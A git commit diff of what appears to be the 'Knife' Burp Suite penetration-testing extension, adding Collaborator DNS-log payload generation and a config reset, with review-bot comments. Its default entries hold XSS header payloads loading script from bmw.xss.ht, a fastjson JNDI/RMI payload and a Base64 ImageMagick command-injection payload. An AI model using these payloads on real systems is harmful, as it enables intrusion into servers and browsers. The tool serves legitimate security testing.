
Commit da31db9

committed
update
1 parent bd6343b commit da31db9

4 files changed

Lines changed: 71 additions & 40 deletions


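--- a/src/burp/BurpExtender.java
+++ b/src/burp/BurpExtender.java
@@ -60,7 +60,7 @@ public class BurpExtender extends GUI implements IBurpExtender, IContextMenuFact
 public static PrintWriter stdout;
 public static PrintWriter stderr;
 public IContextMenuInvocation invocation;
-
+public static IBurpCollaboratorClientContext DNSlogClient;
 
 public static String ExtensionName = "Knife";
 public static String Version = bsh.This.class.getPackage().getImplementationVersion();
@@ -76,6 +76,8 @@ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
 flushStd();
 BurpExtender.stdout.println(getFullExtensionName());
 BurpExtender.stdout.println(github);
+
+DNSlogClient = callbacks.createBurpCollaboratorClientContext();
 
 configTable = new ConfigTable(new ConfigTableModel());
 configPanel.setViewportView(configTable);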
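Review bot: The assignment `DNSlogClient = callbacks.createBurpCollaboratorClientContext();` has to stay above `configTable = new ConfigTable(new ConfigTableModel());`, because the model's defaults now read this static through `ConfigTableModel.genDnslogPayload()`, and nothing in the hunk says so. A comment such as `// must be set before ConfigTableModel is built: its default entries call genDnslogPayload()` would keep a later reorder from turning into a NullPointerException at extension load. The field is also `public static` and non-final, so any class can replace the context; interactions for a payload are, as far as I know, only retrievable through the context that generated it, so a private field with a getter would be safer. registerExtenderCallbacks continues outside the hunk.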

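--- a/src/config/ConfigEntry.java
+++ b/src/config/ConfigEntry.java
@@ -336,7 +336,7 @@ public String getFinalValue(IHttpRequestResponse[] messageInfos) {
 }
 }
 for (ConfigEntry config : varConfigs) {
-if (valueStr.toLowerCase().contains("{" + config.getKey() + "}")) {
+if (valueStr.toLowerCase().contains("{" + config.getKey().toLowerCase() + "}")) {
 valueStr = findAndReplace(valueStr, "{" + config.getKey() + "}", config.getValue());
 }
 }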
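Review bot: The guard on the changed line is now case-insensitive, but the replacement on the next line still searches for `"{" + config.getKey() + "}"` in its original case. Unless `findAndReplace` (not visible here) ignores case, a value containing `{dnslogserver}` passes the check for the key `DNSlogServer` and is then left unreplaced, so the literal placeholder goes out in the request. Either make the replacement case-insensitive as well, e.g. `valueStr = valueStr.replaceAll("(?i)" + Pattern.quote("{" + config.getKey() + "}"), Matcher.quoteReplacement(config.getValue()));`, or confirm that `findAndReplace` already does this. Both `toLowerCase()` calls should take `Locale.ROOT` so the match does not depend on the default locale. getFinalValue starts and ends outside the hunk.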

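--- a/src/config/ConfigTableMenu.java
+++ b/src/config/ConfigTableMenu.java
@@ -2,6 +2,7 @@
 
 import java.awt.event.ActionEvent;
 import java.io.PrintWriter;
+import java.util.List;
 
 import javax.swing.AbstractAction;
 import javax.swing.JMenuItem;
@@ -52,10 +53,27 @@ public void actionPerformed(ActionEvent actionEvent) {
 }
 }
 });
+
+
+JMenuItem resetItem = new JMenuItem(new AbstractAction("Reset Config") {
+@Override
+public void actionPerformed(ActionEvent actionEvent) {
+for (int row:modelRows) {
+ConfigEntry config = configTable.getConfigTableModel().getConfigEntries().get(row);
+List<ConfigEntry> defaults = ConfigTableModel.initDefaultConfigs();
+for (ConfigEntry item:defaults) {
+if (item.getKey().equals(config.getKey())) {
+config.setValue(item.getValue());
+}
+}
+}
+}
+});
 
 add(itemNumber);
 add(enableItem);
 add(disableItem);
+add(resetItem);
 }
 
 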
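Review bot: `ConfigTableModel.initDefaultConfigs()` is called inside `for (int row:modelRows)`, so every selected row rebuilds the whole default list, including a fresh Collaborator payload and the `new File(...).exists()` probes done there. Move `List<ConfigEntry> defaults = ConfigTableModel.initDefaultConfigs();` above the loop and `break` after the matching key. Nothing visible tells the table that the value changed; if `setValue` does not fire an event itself, add `configTable.getConfigTableModel().fireTableRowsUpdated(row, row);` after it so the view and any save-on-change listener see the reset. Resetting `DNSlogServer` also yields a newly generated payload rather than the value the row had at startup, which is worth a one-line comment. The enclosing constructor starts outside the hunk.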

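--- a/src/config/ConfigTableModel.java
+++ b/src/config/ConfigTableModel.java
@@ -1,5 +1,6 @@
 package config;
 
+import java.awt.Container;
 import java.io.File;
 import java.io.PrintWriter;
 import java.util.ArrayList;
@@ -39,60 +40,70 @@ public class ConfigTableModel extends AbstractTableModel{
 + "--max-rtt-timeout 1000ms --max-retries 0 --max-scan-delay 0 --min-rate 3000 {Host}";
 
 private static final String Robot_Input_Comment = "this config effects how sqlmap and nmap runs";
-
-public ConfigTableModel(){
-
-configEntries.add(new ConfigEntry("Put_MenuItems_In_One_Menu", "",ConfigEntry.Config_Basic_Variable,false,false));
-configEntries.add(new ConfigEntry("DNSlogServer", "bit.0y0.link",ConfigEntry.Config_Basic_Variable,true,false));
+
+public static String genDnslogPayload() {
+String fullPayload = BurpExtender.DNSlogClient.generatePayload(false)+"."+BurpExtender.DNSlogClient.getCollaboratorServerLocation();
+return fullPayload;
+}
+
+public static List<ConfigEntry> initDefaultConfigs() {
+List<ConfigEntry> defaultConfigEntries = new ArrayList<>();
+defaultConfigEntries.add(new ConfigEntry("Put_MenuItems_In_One_Menu", "",ConfigEntry.Config_Basic_Variable,false,false));
+defaultConfigEntries.add(new ConfigEntry("DNSlogServer", genDnslogPayload(),ConfigEntry.Config_Basic_Variable,true,false));
 if (SystemUtils.isMac()) {
-configEntries.add(new ConfigEntry("browserPath", Firefox_Mac,ConfigEntry.Config_Basic_Variable,true,false));
+defaultConfigEntries.add(new ConfigEntry("browserPath", Firefox_Mac,ConfigEntry.Config_Basic_Variable,true,false));
 }else {
 if (new File(Firefox_Windows_C).exists()){
-configEntries.add(new ConfigEntry("browserPath", Firefox_Windows_C,ConfigEntry.Config_Basic_Variable,true,false));
+defaultConfigEntries.add(new ConfigEntry("browserPath", Firefox_Windows_C,ConfigEntry.Config_Basic_Variable,true,false));
 }else {
-configEntries.add(new ConfigEntry("browserPath", Firefox_Windows_D,ConfigEntry.Config_Basic_Variable,true,false));
+defaultConfigEntries.add(new ConfigEntry("browserPath", Firefox_Windows_D,ConfigEntry.Config_Basic_Variable,true,false));
 }
 }
-configEntries.add(new ConfigEntry("tokenHeaders", "token,Authorization,Auth,jwt",ConfigEntry.Config_Basic_Variable,true,false));
-//configEntries.add(new ConfigEntry("DismissedTargets", "{\"*.firefox.com\":\"Drop\",\"*.mozilla.com\":\"Drop\"}",ConfigEntry.Config_Basic_Variable,true,false));
-//configEntries.add(new ConfigEntry("DismissedAutoForward", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
-//configEntries.add(new ConfigEntry("DismissedHost", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
-//configEntries.add(new ConfigEntry("DismissedURL", "",ConfigEntry.Config_Basic_Variable,true,false));
-//configEntries.add(new ConfigEntry("DismissAction", "enable = ACTION_DROP; disable = ACTION_DONT_INTERCEPT",ConfigEntry.Config_Basic_Variable,true,false,"enable this config to use ACTION_DROP,disable to use ACTION_DONT_INTERCEPT"));
-configEntries.add(new ConfigEntry("XSS-Payload", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Config_Basic_Variable,true,false));
-
-configEntries.add(new ConfigEntry("SQLMap-Command",SQLMap_Command,ConfigEntry.Run_External_Cmd,true,true));
-configEntries.add(new ConfigEntry("Nmap-Command",Nmap_Command,ConfigEntry.Run_External_Cmd,true,false));
-configEntries.add(new ConfigEntry("RunTerminalWithRobotInput","",ConfigEntry.Config_Basic_Variable,false,false,Robot_Input_Comment));
-configEntries.add(new ConfigEntry("RunTerminalWithKonsole","",ConfigEntry.Config_Basic_Variable,false,false,"判断是否为konsole终端"));
+defaultConfigEntries.add(new ConfigEntry("tokenHeaders", "token,Authorization,Auth,jwt",ConfigEntry.Config_Basic_Variable,true,false));
+//defaultConfigEntries.add(new ConfigEntry("DismissedTargets", "{\"*.firefox.com\":\"Drop\",\"*.mozilla.com\":\"Drop\"}",ConfigEntry.Config_Basic_Variable,true,false));
+//defaultConfigEntries.add(new ConfigEntry("DismissedAutoForward", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
+//defaultConfigEntries.add(new ConfigEntry("DismissedHost", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
+//defaultConfigEntries.add(new ConfigEntry("DismissedURL", "",ConfigEntry.Config_Basic_Variable,true,false));
+//defaultConfigEntries.add(new ConfigEntry("DismissAction", "enable = ACTION_DROP; disable = ACTION_DONT_INTERCEPT",ConfigEntry.Config_Basic_Variable,true,false,"enable this config to use ACTION_DROP,disable to use ACTION_DONT_INTERCEPT"));
+defaultConfigEntries.add(new ConfigEntry("XSS-Payload", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Config_Basic_Variable,true,false));
+
+defaultConfigEntries.add(new ConfigEntry("SQLMap-Command",SQLMap_Command,ConfigEntry.Run_External_Cmd,true,true));
+defaultConfigEntries.add(new ConfigEntry("Nmap-Command",Nmap_Command,ConfigEntry.Run_External_Cmd,true,false));
+defaultConfigEntries.add(new ConfigEntry("RunTerminalWithRobotInput","",ConfigEntry.Config_Basic_Variable,false,false,Robot_Input_Comment));
+defaultConfigEntries.add(new ConfigEntry("RunTerminalWithKonsole","",ConfigEntry.Config_Basic_Variable,false,false,"判断是否为konsole终端"));
 //Mac中,通过脚本执行的也会有命令历史记录,使用这种方式最好
 
-configEntries.add(new ConfigEntry("Chunked-Length", "10",ConfigEntry.Config_Chunked_Variable,true,false));
-configEntries.add(new ConfigEntry("Chunked-AutoEnable", "",ConfigEntry.Config_Chunked_Variable,false,false));
-configEntries.add(new ConfigEntry("Chunked-UseComment", "",ConfigEntry.Config_Chunked_Variable,true,false));
+defaultConfigEntries.add(new ConfigEntry("Chunked-Length", "10",ConfigEntry.Config_Chunked_Variable,true,false));
+defaultConfigEntries.add(new ConfigEntry("Chunked-AutoEnable", "",ConfigEntry.Config_Chunked_Variable,false,false));
+defaultConfigEntries.add(new ConfigEntry("Chunked-UseComment", "",ConfigEntry.Config_Chunked_Variable,true,false));
 
-//configEntries.add(new ConfigEntry("Proxy-ServerList", "127.0.0.1:8888;127.0.0.1:9999;",ConfigEntry.Config_Proxy_Variable,false,false));
-//configEntries.add(new ConfigEntry("Proxy-UseRandomMode", "",ConfigEntry.Config_Proxy_Variable,true,false));
+//defaultConfigEntries.add(new ConfigEntry("Proxy-ServerList", "127.0.0.1:8888;127.0.0.1:9999;",ConfigEntry.Config_Proxy_Variable,false,false));
+//defaultConfigEntries.add(new ConfigEntry("Proxy-UseRandomMode", "",ConfigEntry.Config_Proxy_Variable,true,false));
 //以上都是固定基础变量,不需要修改名称和类型
 
-configEntries.add(new ConfigEntry("Last-Modified", "",ConfigEntry.Action_Remove_From_Headers,true,true));
-configEntries.add(new ConfigEntry("If-Modified-Since", "",ConfigEntry.Action_Remove_From_Headers,true,true));
-configEntries.add(new ConfigEntry("If-None-Match", "",ConfigEntry.Action_Remove_From_Headers,true,true));
-configEntries.add(new ConfigEntry("OPTIONS", "",ConfigEntry.Action_Forward_And_Hide_Options,true,true));
+defaultConfigEntries.add(new ConfigEntry("Last-Modified", "",ConfigEntry.Action_Remove_From_Headers,true,true));
+defaultConfigEntries.add(new ConfigEntry("If-Modified-Since", "",ConfigEntry.Action_Remove_From_Headers,true,true));
+defaultConfigEntries.add(new ConfigEntry("If-None-Match", "",ConfigEntry.Action_Remove_From_Headers,true,true));
+defaultConfigEntries.add(new ConfigEntry("OPTIONS", "",ConfigEntry.Action_Forward_And_Hide_Options,true,true));
 
-configEntries.add(new ConfigEntry("X-Forwarded-For", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Action_Add_Or_Replace_Header,true,true));
+defaultConfigEntries.add(new ConfigEntry("X-Forwarded-For", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Action_Add_Or_Replace_Header,true,true));
 //避免IP:port的切分操作,把Payload破坏,所以使用不带分号的简洁Payload
-configEntries.add(new ConfigEntry("User-Agent", "'\\\"/><script src=https://bmw.xss.ht></script><img/src={dnslogserver}/{host}>",ConfigEntry.Action_Append_To_header_value,true,true));
-//configEntries.add(new ConfigEntry("knife", "'\\\"/><script src=https://bmw.xss.ht></script><img/src=%dnslogserver/%host>",ConfigEntry.Action_Add_Or_Replace_Header,true));
+defaultConfigEntries.add(new ConfigEntry("User-Agent", "'\\\"/><script src=https://bmw.xss.ht></script><img/src={dnslogserver}/{host}>",ConfigEntry.Action_Append_To_header_value,true,true));
+//defaultConfigEntries.add(new ConfigEntry("knife", "'\\\"/><script src=https://bmw.xss.ht></script><img/src=%dnslogserver/%host>",ConfigEntry.Action_Add_Or_Replace_Header,true));
 
-configEntries.add(new ConfigEntry("fastjson", "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://{host}.fastjson.{dnslogserver}/evil\",\"autoCommit\":true}",ConfigEntry.Config_Custom_Payload,true));
+defaultConfigEntries.add(new ConfigEntry("fastjson", "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://{host}.fastjson.{dnslogserver}/evil\",\"autoCommit\":true}",ConfigEntry.Config_Custom_Payload,true));
 
-configEntries.add(new ConfigEntry("Imagemagick","cHVzaCBncmFwaGljLWNvbnRleHQNCnZpZXdib3ggMCAwIDY0MCA0ODANCmltYWdlIG92ZXIgMCwwIDAsMCAnaHR0cHM6Ly9pbWFnZW1hZ2ljLmJpdC4weTAubGluay94LnBocD94PWB3Z2V0IC1PLSAlcyA+IC9kZXYvbnVsbGAnDQpwb3AgZ3JhcGhpYy1jb250ZXh0",ConfigEntry.Config_Custom_Payload_Base64,true));
+defaultConfigEntries.add(new ConfigEntry("Imagemagick","cHVzaCBncmFwaGljLWNvbnRleHQNCnZpZXdib3ggMCAwIDY0MCA0ODANCmltYWdlIG92ZXIgMCwwIDAsMCAnaHR0cHM6Ly9pbWFnZW1hZ2ljLmJpdC4weTAubGluay94LnBocD94PWB3Z2V0IC1PLSAlcyA+IC9kZXYvbnVsbGAnDQpwb3AgZ3JhcGhpYy1jb250ZXh0",ConfigEntry.Config_Custom_Payload_Base64,true));
 
-configEntries.add(new ConfigEntry("*.firefox.com", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
-configEntries.add(new ConfigEntry("*.mozilla.com", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
-configEntries.add(new ConfigEntry("*.mozilla.org", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
-configEntries.add(new ConfigEntry("*.mozilla.net", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
+defaultConfigEntries.add(new ConfigEntry("*.firefox.com", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
+defaultConfigEntries.add(new ConfigEntry("*.mozilla.com", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
+defaultConfigEntries.add(new ConfigEntry("*.mozilla.org", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
+defaultConfigEntries.add(new ConfigEntry("*.mozilla.net", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
+return defaultConfigEntries;
+}
+
+public ConfigTableModel(){
+configEntries = initDefaultConfigs();
 }
 
 public void addListener() {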
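Review bot: `genDnslogPayload()` dereferences `BurpExtender.DNSlogClient` with no null check and no handling for a failing `generatePayload`, and since the constructor now goes through `initDefaultConfigs()`, any failure there aborts building the whole config table. `generatePayload` presumably fails when Collaborator is disabled in the project options (confirm against the Burp API), so the method should fall back to an empty value and log to `BurpExtender.stderr`, as in the fence below. The added `import java.awt.Container;` is not used by anything in this hunk. The `Imagemagick` default is carried over unchanged and its Base64 value appears to still embed the old `bit.0y0.link` host, so that entry does not follow the new `DNSlogServer` default.

```java
public static String genDnslogPayload() {
    // The context is assigned in BurpExtender.registerExtenderCallbacks(); it is null before that.
    if (BurpExtender.DNSlogClient == null) {
        return "";
    }
    try {
        return BurpExtender.DNSlogClient.generatePayload(false) + "."
                + BurpExtender.DNSlogClient.getCollaboratorServerLocation();
    } catch (RuntimeException e) {
        // Presumably raised when Collaborator is disabled; keep the extension loading.
        BurpExtender.stderr.println("Collaborator payload unavailable: " + e.getMessage());
        return "";
    }
}
// … unchanged: initDefaultConfigs() and the constructor …
```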
